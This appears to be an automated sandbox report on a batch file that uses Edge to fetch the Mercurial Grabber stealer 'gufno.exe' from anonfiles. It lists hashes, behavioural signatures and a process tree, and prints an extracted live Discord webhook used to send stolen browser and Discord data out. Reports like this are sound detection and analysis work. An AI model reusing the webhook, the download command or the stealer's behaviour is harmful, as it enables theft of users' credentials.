Analysis
-
max time kernel
416s -
max time network
401s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
30-06-2023 00:46
Static task
static1
Behavioral task
behavioral1
Sample
syf.bat
Resource
win10v2004-20230621-en
General
-
Target
syf.bat
-
Size
66B
-
MD5
e0826630cae6cb850d279f15f341e64d
-
SHA1
b49dd815cb1f2dfa6023b66930c407be37c272d3
-
SHA256
200f7d7d6ff1e2907a344c5bd4a07435479fc83a71f8c82887995f23a2e1de6d
-
SHA512
fda98de97d58de7b1c3fc2f7d0d5b26acd40aac7f7f151b54f3c72d3cae82f60779402616966e88805b15b2601e9437e57898f2e183b561153b42137c96113fb
Malware Config
Extracted
mercurialgrabber
https://discord.com/api/webhooks/1123613383334297702/ygbkzaoZsN7geZf0_Godm64atMjwGcn6nKS0E9XU_sdFhCer22GARIslt7tIgwaVFzoY
Signatures
-
Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
gufno.exegufno.exegufno.exepid process 5688 gufno.exe 2404 gufno.exe 1004 gufno.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Software\Microsoft\Windows\CurrentVersion\Run chrome.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 168 ip4.seeip.org 179 ip-api.com 186 ip4.seeip.org 134 ip4.seeip.org 135 ip4.seeip.org 136 ip4.seeip.org 138 ip-api.com -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\495727d1-d67f-44d9-9300-3673d462ef3e.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230630004648.pma setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1168 5688 WerFault.exe gufno.exe 5932 2404 WerFault.exe gufno.exe 5028 1004 WerFault.exe gufno.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
gufno.exegufno.exegufno.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 gufno.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString gufno.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 gufno.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString gufno.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 gufno.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString gufno.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
msedge.exechrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133325597135138274" chrome.exe -
Modifies registry class 2 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\Local Settings msedge.exe -
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 609453.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exechrome.exepid process 3268 msedge.exe 3268 msedge.exe 1520 msedge.exe 1520 msedge.exe 2360 identity_helper.exe 2360 identity_helper.exe 5332 msedge.exe 5332 msedge.exe 5476 chrome.exe 5476 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
Processes:
msedge.exechrome.exepid process 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
gufno.exechrome.exegufno.exegufno.exedescription pid process Token: SeDebugPrivilege 5688 gufno.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeDebugPrivilege 2404 gufno.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeDebugPrivilege 1004 gufno.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe Token: SeCreatePagefilePrivilege 5476 chrome.exe Token: SeShutdownPrivilege 5476 chrome.exe -
Suspicious use of FindShellTrayWindow 39 IoCs
Processes:
msedge.exechrome.exepid process 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 1520 msedge.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
chrome.exepid process 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe 5476 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exemsedge.exedescription pid process target process PID 4436 wrote to memory of 1520 4436 cmd.exe msedge.exe PID 4436 wrote to memory of 1520 4436 cmd.exe msedge.exe PID 1520 wrote to memory of 3448 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3448 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 1356 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3268 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3268 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe PID 1520 wrote to memory of 3560 1520 msedge.exe msedge.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\syf.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://anonfiles.com/0fB4u5zfz1/gufno_exe2⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7fff337e46f8,0x7fff337e4708,0x7fff337e47183⤵PID:3448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:23⤵PID:1356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:3268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2988 /prefetch:83⤵PID:3560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:13⤵PID:1076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:13⤵PID:1240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:13⤵PID:1884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 /prefetch:83⤵PID:764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
PID:4256 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff793b75460,0x7ff793b75470,0x7ff793b754804⤵PID:5056
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:2360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:13⤵PID:2676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:13⤵PID:4472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:13⤵PID:3364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:13⤵PID:4536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:13⤵PID:4992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5348 /prefetch:83⤵PID:3828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:13⤵PID:4360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:13⤵PID:3500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6712 /prefetch:83⤵PID:5144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3716 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5332
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1368
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5528
-
C:\Users\Admin\Downloads\gufno.exe"C:\Users\Admin\Downloads\gufno.exe"1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:5688 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5688 -s 21522⤵
- Program crash
PID:1168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5476 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff35369758,0x7fff35369768,0x7fff353697782⤵PID:5624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1824 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:22⤵PID:1932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:82⤵PID:4984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1444 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:82⤵PID:5848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3248 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:12⤵PID:2496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3380 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:12⤵PID:5888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4536 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:12⤵PID:6028
-
-
